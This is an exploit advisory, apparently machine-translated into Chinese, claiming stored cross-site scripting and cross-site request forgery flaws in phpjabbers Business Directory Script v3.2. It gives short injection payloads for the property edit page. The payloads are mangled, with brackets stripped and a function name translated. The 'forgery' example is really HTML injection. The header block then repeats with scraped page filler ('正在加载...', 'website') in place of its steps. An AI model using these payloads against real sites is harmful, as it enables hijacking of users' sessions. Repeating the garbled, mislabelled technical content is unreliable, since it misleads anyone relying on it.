#利用标题: phpjabbers业务目录脚本v3.2-多个漏洞
#日期: 09/08/2023
#利用作者: Kerimcan Ozturk
#供应商homepage: https://www.phpjabbers.com/
#软件link: https://www.phpjabbers.com/business-directory-script/
#版本: 3.2
#测试在: Windows 10 Pro
## 描述
技术细节/POC
================================
登录帐户
转到属性页(
编辑任何属性(
)
[1]跨站点脚本(XSS)
请求:
'scriptimage/src/onerror=提示(8)
[2]跨站点伪造
请求:
'ScriptFont%20Color='Green'kerimcan%20ozturk/font
此致
#日期: 09/08/2023
#利用作者: Kerimcan Ozturk
#供应商homepage: https://www.phpjabbers.com/
#软件link: https://www.phpjabbers.com/business-directory-script/
#版本: 3.2
#测试在: Windows 10 Pro
## 描述
技术细节/POC
================================
登录帐户
转到属性页(
正在加载...
website
正在加载...
website
[1]跨站点脚本(XSS)
请求:
正在加载...
website
[2]跨站点伪造
请求:
正在加载...
website
此致